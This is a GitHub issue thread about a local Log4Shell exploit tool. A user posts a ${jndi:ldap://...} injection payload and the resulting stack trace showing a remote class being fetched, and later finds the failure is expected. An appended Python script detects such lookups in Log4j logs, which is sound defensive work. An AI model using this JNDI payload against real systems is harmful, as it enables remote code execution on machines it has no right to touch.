This repository has been archived by the owner on Jun 12, 2022. It is now read-only.

I get java.lang.ClassCastException for Main #2

Closed
franktate opened this issue Dec 13, 2021 · 1 comment

@franktate

Thanks a ton for your great local exploit! I'm just having a problem on Ubuntu with OpenJDK 11. When I run the log4j-client-1.0-SNAPSHOT.jar file and pass in the string ${jndi:ldap://127.0.0.1:3001}, I get the following error:

Mon Dec 13 2021 08:50:12 GMT-0800 (Pacific Standard Time) Request was made: /Main.class
2021-12-13 08:50:12,761 main WARN Error looking up JNDI resource [ldap://127.0.0.1:3001/]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')]; remaining name ''
at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1121)
at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)
at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:207)
at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:198)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1060)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:982)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:878)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:433)
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:341)
at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:240)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:225)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)
at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:543)
at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:502)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:485)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:460)
at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82)
at org.apache.logging.log4j.core.Logger.log(Logger.java:162)
at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2190)
at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2144)
at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2127)
at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2003)
at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1975)
at org.apache.logging.log4j.spi.AbstractLogger.trace(AbstractLogger.java:2330)
at win.roto.client.Main.main(Main.java:33)
Caused by: java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')
at java.naming/javax.naming.spi.NamingManager.getObjectFactoryFromReference(NamingManager.java:179)
at java.naming/javax.naming.spi.DirectoryManager.getObjectInstance(DirectoryManager.java:188)
at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1114)
... 38 more

I can see that it's certainly trying to trigger the vulnerability, but fails.

@franktate
Author

Never mind - I see that's normal. Just need to edit Main.java to do something valid on Linux. Thanks.
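
For anyone triaging application logs, the WARN line in this thread is a useful detection signal. The following is an added example, not part of the original thread or the repository's code. It classifies Log4j "Error looking up JNDI resource" lines: a ClassCastException to `javax.naming.spi.ObjectFactory` on a class loaded by `FactoryURLClassLoader` means the JVM already fetched and instantiated a remote class before the cast failed. The function name, severity labels and the non-issue log lines are assumptions constructed for illustration.

```python
import re

# Constructed sample: the WARN line reported in the issue above, plus two
# made-up lines (INFO and a refused connection) so the script runs offline.
SAMPLE_LOG = """\
2021-12-13 08:50:10,101 main INFO starting client
2021-12-13 08:50:12,761 main WARN Error looking up JNDI resource [ldap://127.0.0.1:3001/]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')]; remaining name ''
2021-12-13 08:51:40,002 main WARN Error looking up JNDI resource [ldap://192.0.2.10:1389/a]. javax.naming.CommunicationException: 192.0.2.10:1389 [Root exception is java.net.ConnectException: Connection refused]
"""

# Log4j's warning when a ${jndi:...} lookup throws; the URL is in brackets.
LOOKUP = re.compile(r"Error looking up JNDI resource \[(?P<url>[^\]]+)\]")
# The cast in NamingManager is applied to an already-created instance.
CAST = re.compile(
    r"ClassCastException: class (?P<cls>\S+) cannot be cast to class "
    r"javax\.naming\.spi\.ObjectFactory"
)


def triage(log_text):
    """Return one finding per JNDI lookup failure (hypothetical helper)."""
    findings = []
    for line in log_text.splitlines():
        lookup = LOOKUP.search(line)
        if not lookup:
            continue
        cast = CAST.search(line)
        if cast and "FactoryURLClassLoader" in line:
            # Class came from a remote codebase and was instantiated.
            severity = "remote-class-instantiated"
        elif cast:
            severity = "factory-cast-failed"
        else:
            # Lookup was attempted but no object factory was created.
            severity = "lookup-attempted"
        findings.append({
            "url": lookup.group("url"),
            "class": cast.group("cls") if cast else None,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

A host that logs a `remote-class-instantiated` finding should be handled as if the remote class's initializer and constructor ran, regardless of the exception that followed.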
